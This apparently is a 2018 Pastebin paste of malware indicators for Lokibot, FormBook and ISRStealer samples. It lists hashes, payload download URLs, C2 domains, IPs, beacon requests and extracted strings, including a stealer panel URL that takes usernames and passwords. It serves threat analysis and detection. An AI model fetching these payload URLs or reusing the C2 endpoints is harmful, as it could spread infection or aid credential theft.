API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 8th, 2018
242
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.25 KB | None | 0 0
raw download clone embed print report
  1. #Lokibot
  2. the c2 is dead..manual analysis reveals where it was located.
  3. "New order.exe"
  4. sha256 4d6b690c476dbe7929d0e9c630df8374186b1b9e357f50f04494db556fb857d8
  5. sha1 69c8bb61eac811e0c667b520c081096a19959930
  6. md5 0b09f5e0ad21b4e80cf4bebd33cb6412
  7. Dropped executable file
  8. sha256 C:\Users\admin\AppData\Roaming\F63AAA\A71D80.exe 6df94b7fa33f1b87142adc39b3db0613fc520d9e7a5fd6a5301dd7f51f8d0386
  9. DNS requests
  10. domain oja34user[.]com
  11.  
  12. Unpacked: https://www.virustotal.com/#/file/342fa89846da6d06dae7668127dfbf4f89ff92112cd2391fec5fb15171ad566a/details
  13.  
  14. strings:
  15. MAC=%02X%02X%02XINSTALL=%08X%08Xk
  16. http://oja34user.com/emma/Panel/five/fre.php
  17.  
  18.  
  19.  
  20. #FormBook #ISRstealer
  21.  
  22. #formbook
  23. "1p.exe"
  24. url http://sealtravel.co.ke/chrome/1p.exe
  25. sha256 85c093096a6fd8e8a5d9578a3251421d0defb94edade3e8aa75351a6a92ce33f
  26. sha1 488a1ec122268fcce26a7a39244611f76ce327c8
  27. md5 ef46006dec50bb2a265617e9c3054220
  28. DNS requests
  29. domain www.doctors-inc.net
  30. domain www.teralabo.com
  31. domain www.lxztrrwzx67-pdliebbcnx.tech
  32. domain www.administrator-on-call.com
  33. domain www.lc9665.com
  34. Connections
  35. ip 117.169.84.232
  36. ip 72.52.4.122
  37. ip 172.217.22.115
  38. HTTP/HTTPS requests
  39. url http://www.administrator-on-call.com/lo/?qr-=XY4vAE5JWOHo6cpyHYpWhbyZIrQ4h8LHqVczto7ni7rQwQKP1xl9p4sdEVcaR4wwwU+plA==&qNG=DXRDwDUh8FMTY
  40. url http://www.lc9665.com/lo/
  41. url http://www.lc9665.com/lo/?qr-=VQDxoS2ACcuYGErQ2Q+JGjzA2udBux6R+4EVqnfb/s6g3lTabJbkcQN8F+Q15js0zjxHFw==&qNG=DXRDwDUh8FMTY&sql=1
  42. url http://www.doctors-inc.net/lo/?qr-=LGvBXu2gCtUdgWsP+AUC6SZsApAxInbCgICDbjtK16opxMymUDfvgrT8z+HHXWWGt8v7hA==&qNG=DXRDwDUh8FMTY&sql=1
  43. url http://www.doctors-inc.net/lo/
  44.  
  45. "3p.exe"
  46. url http://sealtravel.co.ke/chrome/3p.exe
  47. sha256 55a57cbd97abb3ea89e14fc42732c0396d508835460a27e150580d1b30b7c733
  48. sha1 ccaffa6e6b9c23f9cc7637db1b5392dfcd7f3d0c
  49. md5 416718cbe4198ac882b77b1eac504196
  50. DNS requests
  51. domain www.citadelip.com
  52. domain www.kloramde.com
  53. Connections
  54. ip 192.185.28.193
  55. ip 198.187.30.201
  56. HTTP/HTTPS requests
  57. url http://www.kloramde.com/lo/?EZQltXS=oPgwoGDpGMvVAiAvBZzSDKnFD14HxnmgmreuF77oWdRODJQePVuUG50y5dv1TAmkvj+FXQ==&DzyLb=VD8LEnU8_TnxKj
  58. url http://www.citadelip.com/lo/?EZQltXS=gKqTGck4BNLgYiaQ8+7gGlkIF/JLnCJfWxY/ZRmUg5Hq0cuP+3ZdvNIqJj7tDCek97QcOQ==&DzyLb=VD8LEnU8_TnxKj&sql=1
  59. url http://www.citadelip.com/lo/
  60.  
  61.  
  62. "5x.exe"
  63. url http://sealtravel.co.ke/chrome/5x.exe
  64. sha256 3b03539fc2341a619ce138b2c4977ec9054df52ac7cfdf329cd0e23ae7c0b352
  65. sha1 94f95cac28919f034067a21ff99f30b2710af34f
  66. md5 3c1633f386bfd6e29f3cfd9114fbe092
  67. DNS requests
  68. domain www.bestdehumidifierguide.com
  69. domain www.wizaallianz.com
  70. domain www.importanceeducated.com
  71. domain www.royaltyfreesubscriptions.com
  72. Connections
  73. ip 54.187.202.68
  74. ip 192.64.119.254
  75. ip 202.71.109.31
  76. ip 104.18.58.184
  77. HTTP/HTTPS requests
  78. url http://www.importanceeducated.com/xa/?Tx4hBt2=LdCX8+p2HXAi9LTIDwQ5MxBTgvdxPDUSuhG/gW+lIGgfEJUoQ6/C3ki3ac30BLTbvkpHgg==&6l=mnBXn
  79. url http://www.royaltyfreesubscriptions.com/xa/?Tx4hBt2=wn/Im6F2gEOoii2gObMST19ozpj2GJKPzODymswawf3y+Bo8pwFEinUwcW6OTQzImi6ofA==&6l=mnBXn&sql=1
  80. url http://www.wizaallianz.com/xa/
  81. url http://www.wizaallianz.com/xa/?Tx4hBt2=Izxx4HqOK6KUQq69aMgqM6mZIfb9U68v16yvcd4wE0Z4eObS2L+2lkstSPc/ZLQXGrJYmA==&6l=mnBXn&sql=1
  82. url http://www.bestdehumidifierguide.com/xa/
  83. url http://www.bestdehumidifierguide.com/xa/?Tx4hBt2=KG1Rc65MqDobK7srlTteBckNFi9wyvO2p4R3XZo0ThSMryCPF3wx9B1k4Qajoy9KYXiCyA==&6l=mnBXn&sql=1
  84.  
  85. #ISRStealer
  86. "3a.exe"
  87. url http://sealtravel.co.ke/chrome/3a.exe
  88. sha256 7dfab1e26e2c172a4c76e710cf7e74cd676b4206e163c19de2ac1b7650637ee3
  89. sha1 95fe82f6955d80f887b3f222696c40edc8dce3bf
  90. md5 afe903482330df4f425a7e48a464821f
  91. DNS requests
  92. domain blacktravertine.com
  93. Connections
  94. ip 85.95.234.101
  95. HTTP/HTTPS requests
  96. url http://blacktravertine.com/wordpress/wp-includes/images/media/windows/chrome/index.php?action=add&username=&password=&app=&pcname=PC&sitename=
  97.  
  98. unpacked: https://www.virustotal.com/#/file/6b138751318b0ab6815cde0fec060d9019e9e06751589107e10b7ec903d6f358/detection
  99.  
  100. strings:
  101. EsISQ6XGhVsi6FyhW3iO3rIwoibWly
  102. HardCore Software For : Public
  103. ?action=add&username=
  104. frrn8--`j_airp_tcprglc,amk-umpbnpcqq-un+glajsbcq-gk_ecq-kcbg_-uglbmuq-afpmkc-glbcv,nfn
  105. Mail Password Recovery
  106. Mail PassView
  107. mailpv
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!